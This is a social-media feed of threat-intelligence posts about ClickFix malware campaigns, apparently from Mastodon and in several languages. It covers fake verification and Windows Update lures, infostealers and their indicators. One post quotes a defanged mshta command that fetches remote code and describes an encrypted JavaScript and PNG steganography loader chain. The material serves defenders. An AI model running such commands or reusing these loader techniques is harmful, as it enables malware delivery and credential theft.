⚠️ New #ClickFix malware campaign is tricking users with a fake browser “fix” prompt that leads to #DarkGate being installed via clipboard PowerShell commands. 📋
Read: https://hackread.com/clickfix-attack-fake-browser-install-darkgate-malware/
#clickfix
Think parked domains are no big deal? Think again! These domains might seem benign on the surface, but our investigation into the risks of visiting parked domains might surprise you. In fact, if you were to visit a parked domain and actually see that typical park page, consider yourself lucky. Today, visits to these parked domains, which often happen accidentally, have become a source for traffic distribution systems, using a technique referred to by some as direct or zeroclick searches. In our experience this technique is much more likely to send you to threats like scams and malware. ClickFix? Sure. Results resembling what you were actually seeking? Not likely. To see what we found, check out our blog: https://blogs.infoblox.com/threat-intelligence/parked-domains-become-weapons-with-direct-search-advertising/
#InfobloxThreatIntel #dns #threatintel #threatintelligence #infosec #cybersecurity #infoblox #malicious #parking #domains #clickfix #phishing #scam
Heads up on modified #clickfix ; doesn't fire until you click the Verify block:
Unknown malware using WebSockets for botnet command&control, spreading through #ClickFix ⤵️
🖱️ClickFix -> 📃VBS -> ⚙️MSI
Payload delivery host:
🌐 https://urlhaus.abuse.ch/host/103.27.157.60/
Malware sample 🤖:
https://bazaar.abuse.ch/sample/4d8e5e890e8be3a1d3529edd384517f99ec1b05bbed7edb38da936d7b3d7749b/
Botnet C2 domains:
📡 w2li .xyz
📡 w2socks .xyz
The same malware is also being spread by #Amadey pay-per-install (PPI):
➡️ https://urlhaus.abuse.ch/url/3733103/
ClickFix-Attacke missbraucht ChatGPT-Domain für macOS-Malware
Kaspersky-Forscher decken auf, wie Angreifer den gefährlichen AMOS-Infostealer über gefälschte Browser-Anleitungen verbreiten.
https://www.all-about-security.de/clickfix-attacke-missbraucht-chatgpt-domain-fuer-macos-malware/
#kaspersky #clickfix #ChatGPT #infostealer #malware #security
Piratage : « ConsentFix » la nouvelle évolution de « ClickFix »
https://www.lemagit.fr/actualites/366636318/Piratage-ConsentFix-la-nouvelle-evolution-de-ClickFix
#Infosec #Security #Cybersecurity #CeptBiro #Piratage #ConsentFix #ClickFix
📢 ConsentFix : une attaque navigateur qui détourne les consentements OAuth via Azure CLI
📝 Source : Push Security.
📖 cyberveille : https://cyberveille.ch/posts/2025-12-11-consentfix-une-attaque-navigateur-qui-detourne-les-consentements-oauth-via-azure-cli/
🌐 source : https://pushsecurity.com/blog/consentfix
#Azure_CLI #ClickFix #Cyberveille
📢 GrayBravo: quatre clusters CastleLoader ciblent plusieurs secteurs avec phishing ClickFix et C2 redondants
📝 Selon Insikt Group (Recorded Future), avec une...
📖 cyberveille : https://cyberveille.ch/posts/2025-12-10-graybravo-quatre-clusters-castleloader-ciblent-plusieurs-secteurs-avec-phishing-clickfix-et-c2-redondants/
🌐 source : https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries
#CastleLoader #ClickFix #Cyberveille
CastleLoader malware, known for Clickfix related attack, has been upgraded with a stealthy Python loader that helps it slip past security defenses.
Read: https://hackread.com/castleloader-malware-python-loader-bypass-security/
Der bislang als Initial‑Access‑Broker bekannte Akteur Storm‑0249 verändere sein Vorgehen grundlegend, berichtet ReliaQuest. Statt breiter Phishing‑Kampagnen setzt die Gruppe nun auf gezielte, schwer zu erkennbare Techniken, die speziell darauf abzielen, Endpoint‑Detection‑ und Response‑Lösungen (EDR) zu missbrauchen und damit die Grundlage für nachgelagerte Ransomware‑Angriffe zu legen.
Mehr: https://maniabel.work/archiv/745
#infossec #infosecnews #ransomware #storm0249 #clickfix #BeDiS
Command copied, control lost: Fake #ChatGPT Atlas Browser used in a #ClickFix attack tricking users into installing password‑stealing malware via a fake installer.
Read: https://hackread.com/fake-chatgpt-atlas-clickfix-steal-passwords/
Maybe don't trust every Windows Update without checking - hackers hijack images to spread dangerous malware
Hackers are increasingly using fake Windows Update screens to distribute complex malware through social engineering tactics.
ClickFix attacks convince users to execute commands in Windows by mimicking legitimate update prompts in full-screen web browser pages
#ClickFix #windows #windowsupdate #malware #security #cybersecurity #hackers #hacking
Fałszywa aktualizacja Windows – uwaga na metodę ClickFix
Czy weryfikacja zabezpieczająca stronę przed botami może być podstępem? A co z aktualizacją Windows? Badacze z Huntress przeanalizowali malware instalowane za pomocą ciekawej techniki. Mowa o ClickFix, czyli nakłonieniu do wklejenia i uruchomienia złośliwego polecenia. Standardowo wykorzystywano w tym celu strony/okna udające weryfikację – zabezpieczenie przed botami, o których pisaliśmy...
#Aktualności #Awareness #CAPTCHA #Clickfix #Phishing #Schowek #Windows
https://sekurak.pl/falszywa-aktualizacja-windows-uwaga-na-metode-clickfix/
🎯 Threat Intelligence
===================
Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.
Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.
Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.
Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.
Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.
References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.
🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer
🔗 Source: https://www.huntress.com/blog/clickfix-malware-buried-in-images
Fake Windows Update Notifications: ClickFix Malware Campaign Uses PNG Steganography to Evade Detection
#Security #Malware #Cybercrime #Phishing #Microsoft #Windows11 #Cybersecurity #Hackers #Steganography #Rhadamanthys #ClickFix #Infosecurity #ThreatIntel
Queue Windows 11 fix ClickFix in 3...2...
ClickFix operators are now using fake full-screen “Windows Update” pages to push victims into running malicious commands. Combined with steganographic loaders and in-memory execution, these campaigns continue to evolve.
What detection or user-training approach do you think works best today?
Source: https://www.helpnetsecurity.com/2025/11/25/fake-windows-update-screen-clickfix/
Follow @technadu for ongoing threat-intel breakdowns and practical defense insights.
#Infosec #ThreatIntel #ClickFix #EDR #CyberHygiene #MalwareTrends #SecurityOps #WindowsSecurity #InfoStealer
🧩 1️⃣ ClickFix: ataques que engañan como si fueran actualizaciones de Windows.
Un reciente informe advierte como han actualizado la técnica maliciosa llamada ClickFix, usada por ciberdelincuentes para distribuir malware.
El ataque muestra una falsa pantalla de “actualización de Windows” en el navegador.
Si la víctima sigue las instrucciones (como presionar ciertas teclas), termina ejecutando un script malicioso que instala malware — sin descargar ningún archivo evidente ya que todo sucede en la memoria.
Las familias de malware que se instalan suelen ser infostealers o troyanos de acceso remoto, capaces de robar contraseñas, datos bancarios, credenciales de servicios y más.
🔒 ¿Una falsa actualización… o una puerta a robar tus datos?
#Privacidad #Ciberseguridad #Malware #ClickFix
https://www.muycomputer.com/2025/11/25/asi-de-peligrosos-son-los-ataques-clickfix/
Client Info
Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst